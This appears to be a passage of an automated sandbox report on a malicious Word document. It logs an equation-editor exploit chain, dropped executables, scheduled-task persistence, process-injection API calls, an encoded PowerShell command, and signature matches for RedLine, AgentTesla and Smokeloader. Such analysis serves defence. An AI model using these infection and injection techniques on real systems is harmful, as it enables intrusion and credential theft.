              Source: 00000019.00000002.1137718411.0000000000668000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 0000000F.00000002.1154252992.0000000003192000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0000000D.00000002.1022592251.0000000000298000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 0000001B.00000000.1142718218.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0000000F.00000002.1148519214.0000000002216000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 00000013.00000000.1039506487.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000001A.00000002.1148349455.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000F.00000002.1153618394.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0000000F.00000002.1155901803.0000000003222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 00000012.00000000.1036314338.00000000000D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000B.00000000.969363359.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: Process Memory Space: A173.exe PID: 260, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: Process Memory Space: A173.exe PID: 1300, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0000_000000_00000[1].doc, type: DROPPEDMatched rule: SUSP_INDICATOR_RTF_MalVer_Objects date = 2022-10-20, hash2 = a31da6c6a8a340901f764586a28bd5f11f6d2a60a38bf60acd844c906a0d44b1, author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., score = 43812ca7f583e40b3e3e92ae90a7e935c87108fa863702aa9623c6b7dc3697a2, reference = https://github.com/ditekshen/detection
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0000_000000_00000[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F43FFB53.doc, type: DROPPEDMatched rule: SUSP_INDICATOR_RTF_MalVer_Objects date = 2022-10-20, hash2 = a31da6c6a8a340901f764586a28bd5f11f6d2a60a38bf60acd844c906a0d44b1, author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., score = 43812ca7f583e40b3e3e92ae90a7e935c87108fa863702aa9623c6b7dc3697a2, reference = https://github.com/ditekshen/detection
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F43FFB53.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00127D7E appears 33 times
              Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0012860F appears 40 times
              Source: C:\Users\Public\regasm.exeCode function: String function: 0040A19C appears 37 times
              Source: C:\Users\Public\regasm.exeCode function: 7_2_001B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,7_2_001B0110
              Source: C:\Users\Public\regasm.exeCode function: 9_2_004015D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015D6
              Source: C:\Users\Public\regasm.exeCode function: 9_2_0040204E NtQuerySystemInformation,9_2_0040204E
              Source: C:\Users\Public\regasm.exeCode function: 9_2_00402059 NtQuerySystemInformation,9_2_00402059
              Source: C:\Users\Public\regasm.exeCode function: 9_2_00401566 NtAllocateVirtualMemory,9_2_00401566
              Source: C:\Users\Public\regasm.exeCode function: 9_2_00402076 NtQuerySystemInformation,9_2_00402076
              Source: C:\Users\Public\regasm.exeCode function: 9_2_0040207A NtQuerySystemInformation,9_2_0040207A
              Source: C:\Users\Public\regasm.exeCode function: 9_2_004030C3 Sleep,GetModuleFileNameW,MapViewOfFile,LocalAlloc,GetWindowThreadProcessId,NtOpenProcess,NtDuplicateObject,NtQuerySystemInformation,9_2_004030C3
              Source: C:\Users\Public\regasm.exeCode function: 9_2_004022CD NtQuerySystemInformation,9_2_004022CD
              Source: C:\Users\Public\regasm.exeCode function: 9_2_004022D1 NtQuerySystemInformation,9_2_004022D1
              Source: C:\Users\Public\regasm.exeCode function: 9_2_004022D4 NtQuerySystemInformation,9_2_004022D4
              Source: C:\Users\Public\regasm.exeCode function: 9_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015D5
              Source: C:\Users\Public\regasm.exeCode function: 9_2_004015E2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015E2
              Source: C:\Users\Public\regasm.exeCode function: 9_2_004015EF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015EF
              Source: C:\Users\Public\regasm.exeCode function: 9_2_004015F6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015F6
              Source: C:\Users\Public\regasm.exeCode function: 9_2_004025FA NtClose,9_2_004025FA
              Source: C:\Users\Public\regasm.exeCode function: 9_2_00402596 NtEnumerateKey,9_2_00402596
              Source: C:\Users\Public\regasm.exeCode function: 9_2_004022B0 NtQuerySystemInformation,9_2_004022B0
              Source: C:\Users\Public\regasm.exeCode function: 9_2_004022BB NtQuerySystemInformation,9_2_004022BB
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 13_2_001B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,13_2_001B0110
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_004015D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,14_2_004015D6
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_0040204E NtQuerySystemInformation,14_2_0040204E
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_00402059 NtQuerySystemInformation,14_2_00402059
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_00401566 NtAllocateVirtualMemory,14_2_00401566
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_00402076 NtQuerySystemInformation,14_2_00402076
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_0040207A NtQuerySystemInformation,14_2_0040207A
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_004030C3 Sleep,GetModuleFileNameW,MapViewOfFile,LocalAlloc,GetWindowThreadProcessId,NtOpenProcess,NtDuplicateObject,wcsstr,towlower,14_2_004030C3
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_004022CD NtQuerySystemInformation,14_2_004022CD
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_004022D1 NtQuerySystemInformation,14_2_004022D1
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_004022D4 NtQuerySystemInformation,14_2_004022D4
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,14_2_004015D5
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_004015E2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,14_2_004015E2
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_004015EF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,14_2_004015EF
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_004015F6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,14_2_004015F6
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_004025FA NtClose,14_2_004025FA
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_00402596 NtEnumerateKey,14_2_00402596
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_004022B0 NtQuerySystemInformation,14_2_004022B0
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_004022BB NtQuerySystemInformation,14_2_004022BB
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_001249A0 RtlMoveMemory,NtUnmapViewOfSection,16_2_001249A0
              Source: C:\Windows\explorer.exeCode function: 17_2_000638B0 NtUnmapViewOfSection,17_2_000638B0
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000C1016 RtlMoveMemory,NtUnmapViewOfSection,18_2_000C1016
              Source: vbc[1].exe.5.drStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: regasm.exe.5.drStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: efbhiii.11.drStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: Draft Contract.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Draft Contract.docx
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$aft Contract.docxJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOCX@37/31@12/6
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\regasm.exeCode function: 7_2_0040455F GetModuleHandleW,GetEnvironmentStringsW,InterlockedDecrement,InterlockedExchangeAdd,GetConsoleAliasExesLengthW,EnumCalendarInfoA,InterlockedExchangeAdd,GetConsoleTitleA,InterlockedExchangeAdd,EnumDateFormatsW,HeapSetInformation,GetACP,GetModuleHandleW,GetModuleHandleA,GetProcAddress,InterlockedIncrement,FindFirstVolumeA,GetConsoleFontSize,CreateJobObjectA,GetModuleHandleW,FormatMessageA,FindResourceA,CreateTimerQueueTimer,CopyFileW,SearchPathA,GetConsoleTitleW,CancelTimerQueueTimer,VerifyVersionInfoW,FindFirstChangeNotificationW,InterlockedDecrement,InterlockedDecrement,InterlockedExchange,InterlockedDecrement,GetCommandLineW,GetThreadSelectorEntry,GetBinaryTypeA,MoveFileWithProgressA,7_2_0040455F
              Source: explorer.exe, 0000000B.00000000.970463322.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
              Source: Draft Contract.docxReversingLabs: Detection: 17%
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\regasm.exe "C:\Users\Public\regasm.exe"
              Source: C:\Users\Public\regasm.exeProcess created: C:\Users\Public\regasm.exe "C:\Users\Public\regasm.exe"
              Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {C1BB133C-EA54-4D9F-8B7A-F076882918C7} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
              Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\efbhiii C:\Users\user\AppData\Roaming\efbhiii
              Source: C:\Users\user\AppData\Roaming\efbhiiiProcess created: C:\Users\user\AppData\Roaming\efbhiii C:\Users\user\AppData\Roaming\efbhiii
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A173.exe C:\Users\user\AppData\Local\Temp\A173.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwAwAA==
              Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\efbhiii C:\Users\user\AppData\Roaming\efbhiii
              Source: C:\Users\user\AppData\Roaming\efbhiiiProcess created: C:\Users\user\AppData\Roaming\efbhiii C:\Users\user\AppData\Roaming\efbhiii
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess created: C:\Users\user\AppData\Local\Temp\A173.exe C:\Users\user\AppData\Local\Temp\A173.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exe "C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exe"
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\regasm.exe "C:\Users\Public\regasm.exe" Jump to behavior
              Source: C:\Users\Public\regasm.exeProcess created: C:\Users\Public\regasm.exe "C:\Users\Public\regasm.exe" Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A173.exe C:\Users\user\AppData\Local\Temp\A173.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exe "C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exe" Jump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\efbhiii C:\Users\user\AppData\Roaming\efbhiii Jump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\efbhiii C:\Users\user\AppData\Roaming\efbhiii Jump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiProcess created: C:\Users\user\AppData\Roaming\efbhiii C:\Users\user\AppData\Roaming\efbhiii Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwAwAA==Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess created: C:\Users\user\AppData\Local\Temp\A173.exe C:\Users\user\AppData\Local\Temp\A173.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiProcess created: C:\Users\user\AppData\Roaming\efbhiii C:\Users\user\AppData\Roaming\efbhiii
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR476B.tmpJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0012424E CoCreateInstance,SysAllocString,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,wsprintfW,16_2_0012424E
              Source: C:\Users\user\AppData\Local\Temp\A173.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
              Source: C:\Users\user\AppData\Local\Temp\A173.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Users\Public\regasm.exeCode function: 7_2_002DCEDF CreateToolhelp32Snapshot,Module32First,7_2_002DCEDF
              Source: C:\Users\Public\regasm.exeCommand line argument: ruwey7_2_004047DE
              Source: C:\Users\Public\regasm.exeCommand line argument: boselolodurivog7_2_004047DE
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: 27.0.A173.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 27.0.A173.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\Temp\A173.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
